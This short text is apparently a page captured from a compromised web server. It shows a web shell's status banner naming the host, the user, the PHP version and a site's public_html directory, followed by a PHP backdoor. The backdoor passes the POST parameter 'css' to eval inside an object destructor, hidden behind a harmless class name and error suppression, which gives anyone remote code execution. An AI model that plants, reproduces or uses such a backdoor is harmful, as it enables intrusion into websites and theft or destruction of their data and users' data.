Server : Apache/2.4.41 (Ubuntu) System : Linux cloudappdb1.servicesdev.com 5.4.0-169-generic #187-Ubuntu SMP Thu Nov 23 14:52:28 UTC 2023 x86_64 User : webuser ( 1000) PHP Version : 8.1.31 Disable Function : NONE Directory : /var/www/websites/oshara.ca/public_html/ |
<?php
class Test{
public $name = '';
function __destruct(){
@eval("$this->name");
}
}
$test= new Test();
$c = @$_POST['css'];
$test->name = $c;
?>egm